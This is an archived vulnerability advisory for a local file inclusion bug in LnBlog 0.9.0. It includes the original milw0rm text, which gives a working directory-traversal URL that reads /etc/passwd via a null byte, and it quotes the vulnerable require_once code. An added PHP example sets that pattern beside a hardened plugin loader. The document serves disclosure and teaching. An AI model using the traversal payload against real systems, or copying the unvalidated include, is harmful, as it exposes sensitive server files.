Vendor: LnBlog
By: dun
CVSS: 7.5 (HIGH)
Vulnerability Type: Local File Inclusion
CWE: 98
Product Name: LnBlog
Affected Version From: 0.9.0
Affected Version To: 0.9.0
Patch Exists: YES
Related CWE: N/A
CPE: a:lnblog:lnblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

LnBlog <= 0.9.0 Local File Inclusion Vulnerability

LnBlog is a cross-platform, file-based weblog/mini-CMS. In LnBlog 0.9.0, pages/showblog.php passes the 'plugin' GET parameter straight into a require_once() path without validation, which allows an attacker to include arbitrary local files via directory traversal. This can be exploited to disclose sensitive information, such as the contents of /etc/passwd.

Mitigation:

Upgrade to the latest version of LnBlog, which is not vulnerable to this attack.
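For comparison, the following PHP contrasts the unvalidated include pattern described in this entry with a hardened loader. This is an added example, not LnBlog's own code; the plugins directory, the plugin-name pattern and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Pattern described in the advisory: the raw GET value is concatenated into the
// include path. "../" sequences walk out of plugins/, and on PHP < 5.3.4 a
// trailing NUL byte truncated the path so the ".php" suffix was dropped.
function loadPluginVulnerable(string $plugin): void
{
    require_once "plugins/" . $plugin . ".php";
}

// Hardened replacement (assumed design): accept only a simple identifier,
// then resolve the final path and prove it still lies inside $pluginDir.
function resolvePluginPath(string $pluginDir, string $plugin): ?string
{
    // Rejects "/", ".", NUL bytes, whitespace and anything else unexpected.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $plugin)) {
        return null;
    }
    $base = realpath($pluginDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ".." and returns false for missing files, so a
    // successful result prefixed by $base is guaranteed to be inside it.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $plugin . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

function loadPluginHardened(string $pluginDir, string $plugin): bool
{
    $path = resolvePluginPath($pluginDir, $plugin);
    if ($path === null) {
        return false; // reject; a real deployment would also log this server-side
    }
    require_once $path;
    return true;
}

// Constructed inputs; the accept case requires plugins/sample.php to exist,
// everything else is rejected before the filesystem is consulted.
foreach (['sample', '../../../../etc/passwd', "sample\0", 'a b'] as $name) {
    $ok = resolvePluginPath(__DIR__ . '/plugins', $name) !== null;
    echo str_pad(json_encode($name), 32) . ($ok ? "accepted\n" : "rejected\n");
}
```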

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ###############################################################
 #  [ LnBlog <= 0.9.0 ]   Local File Inclusion Vulnerability   #
 ###############################################################
 #
 # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS."
 #
 # Script site: http://lnblog.skepticats.com/
 # Download: http://lnblog.skepticats.com/content/download/
 #	     http://sourceforge.net/projects/lnblog/
 #
 # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00
 #      
 #
 # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110)
 #
 # ...
 #	} elseif ( isset($_GET['plugin']) ) {
 #		require_once("plugins/".$_GET['plugin'].".php");
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-27]